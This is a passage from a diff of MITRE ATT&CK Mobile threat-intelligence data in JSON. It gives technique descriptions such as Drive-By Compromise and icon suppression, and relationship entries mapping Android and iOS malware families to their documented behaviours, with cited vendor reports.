generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. 
There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:24:56.530Z", + "name": "Drive-By Compromise", + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. 
forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Lookout-StealthMango)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can often alert the user if their device is vulnerable to known exploits.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "created": "2017-10-25T14:48:06.822Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + 
"url": "https://attack.mitre.org/techniques/T1456", + "external_id": "T1456" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html", + "external_id": "CEL-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2", + "created": "2019-07-11T18:09:42.039Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1508", + "url": "https://attack.mitre.org/techniques/T1508" + }, + { + "source_name": "sunny-stolen-credentials", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/", + "description": "Lukáš Štefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019." + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019." 
+ }, + { + "source_name": "bankbot-spybanker", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.\n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)", + "modified": "2022-03-30T20:07:33.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Suppress Application Icon", + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7b8c3ae2-7e52-4f1d-ad30-788b367a7531", + "type": "relationship", + "created": "2019-08-07T15:57:13.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. 
Retrieved August 7, 2019." + } + ], + "modified": "2019-09-15T15:36:42.340Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can query various details about the device, including phone number, country, mobile operator, model, root availability, and operating system version.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4fc165fd-185e-4c70-b423-c242cf715510", + "created": "2019-10-07T16:32:27.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:55:21.480Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) checks if it is running in an analysis environment.(Citation: securelist rotexy 2018) ", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--69de3f7e-faa7-4342-b755-4777a68fd89b", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is capable of recording device phone calls.(Citation: Zscaler-SuperMarioRun)", + "modified": "2022-05-20T17:13:16.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f7428d7-6f6e-40d0-aedb-cb0578875ff9", + "created": "2021-10-01T14:42:49.170Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:02.260Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can hide its icon.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--935fd3e3-dd47-4c43-bdd8-1668af26395f", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + 
{ + "source_name": "PaloAlto-SpyDealer", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) enables remote control of the victim through SMS channels.(Citation: PaloAlto-SpyDealer)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc", + "created": "2023-03-20T18:37:57.767Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:37:57.767Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1f027bab-76d9-4f5f-a73e-ea733a1ab223", + "type": "relationship", + "created": "2020-11-20T16:37:28.610Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.610Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) has been distributed in two stages.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0ef4845d-994e-4f0d-9eed-7cf600fc03b4", + "type": "relationship", + "created": "2020-06-02T14:32:31.885Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-02T14:32:31.885Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can track the device’s location.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8b66543e-2ea1-4ff7-84d9-f8f431f53781", + "type": "relationship", + "created": "2020-04-24T15:06:33.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.503Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can record MP4 files and monitor calls.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2a5f4f05-bd60-4571-bcce-f3b764a5b5a0", + "created": "2023-02-28T20:30:01.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. 
Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:08:11.662Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can retrieve the contacts list from an infected device.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--23fa0fcc-0193-45f2-9e0b-a5f68380015f", + "created": "2022-04-01T18:52:13.171Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security software can typically detect if a device has been rooted or jailbroken and can inform the user, who can then take appropriate action.", + "modified": "2022-04-01T18:52:13.171Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a", + "created": "2020-01-27T17:05:58.265Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:27:51.998Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device’s call log.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0e39856-4d2d-45c5-bf16-f683ee993010", + "created": "2022-03-30T18:18:15.915Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T18:18:15.915Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--cde2cb84-455e-410c-8aa9-086f2788bcd2", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c7598a6-6046-491d-99a7-52c31974a9a9", + "created": "2023-03-20T18:57:40.504Z", + "revoked": false, + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:40.504Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b37d94a-64a3-432a-b340-1c9a4f553d02", + "type": "relationship", + "created": "2020-12-17T20:15:22.452Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
+ } + ], + "modified": "2020-12-17T20:15:22.452Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has obfuscated components using XOR, ZIP with a single-byte key or ZIP/Zlib compression wrapped with RC4 encryption.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3e2b9dc1-5da0-46a1-a576-4b41a10f3a60", + "created": "2020-11-24T17:55:12.828Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:27.210Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can access the device’s contact list.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a20581b4-21fa-4ed9-b056-d139998868e8", + "created": "2019-09-04T14:28:15.970Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., 
Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:52:44.819Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve the device's contact list.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7a8e1611-1a7e-45a0-b518-6efd744fce4f", + "type": "relationship", + "created": "2020-12-24T22:04:28.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:28.002Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has sent messages to an attacker-controlled number.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a5b72279-f99e-4f03-8669-04322b40ee6b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "modified": "2020-07-20T13:49:03.710Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) loads an encrypted DEX code payload.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a8565c17-7054-4d3f-bca5-6e17dc931491", + "created": "2023-03-03T16:20:08.033Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). 
YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:20:08.033Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has used private APIs to download and install other pieces of itself, as well as other malicious apps. (Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3c291ee5-1782-4e5b-8131-5188c7388f45", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. 
Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) gathers the device phone number and IMEI and transmits them to a command and control server.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c340b30d-0ad5-4e90-94ce-b6a6b229a7c4", + "created": "2020-09-15T15:18:12.362Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. 
